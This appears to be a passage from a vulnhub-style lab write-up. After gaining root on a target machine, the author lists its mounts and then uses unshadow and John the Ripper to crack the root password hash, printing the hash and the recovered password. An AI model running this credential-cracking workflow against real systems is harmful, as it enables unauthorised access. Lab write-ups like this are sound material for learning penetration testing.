Filesystem 1K-blocks Used Available Use% Mounted on
/dev/mapper/VolGroup00-LogVol00
2888460 1757260 982108 65% /
/dev/hda1 101086 9967 85900 11% /boot
tmpfs 1038136 0 1038136 0% /dev/shm

sh-3.1# mount
/dev/mapper/VolGroup00-LogVol00 on / type ext3 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/hda1 on /boot type ext3 (rw)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
automount(pid1528) on /net type autofs (rw,fd=4,pgrp=1528,minproto=2,maxproto=4)


Now that we have privileged access to the system and access to the shadow and passwd files, we can crack the root password :
root@kali:~/vulhub/ct4# unshadow passwd shadow > unshadow.txt
root@kali:~/vulhub/ct4# grep root unshadow.txt > root.txt
root@kali:~/vulhub/ct4# cat root.txt
root:$1$DSHH/MlC$DH8ClhHKeagYW4PwxICZC0:0:0:root:/root:/bin/bash

root@kali:~/vulhub/ct4# john root.txt
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
root1234 (root)
guesses: 1 time: 0:00:00:00 DONE (Tue Oct 27 19:59:06 2015) c/s: 4320 trying: Root888 - root7777
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ct4# john --show root.txt
root:root1234:0:0:root:/root:/bin/bash

1 password hash cracked, 0 left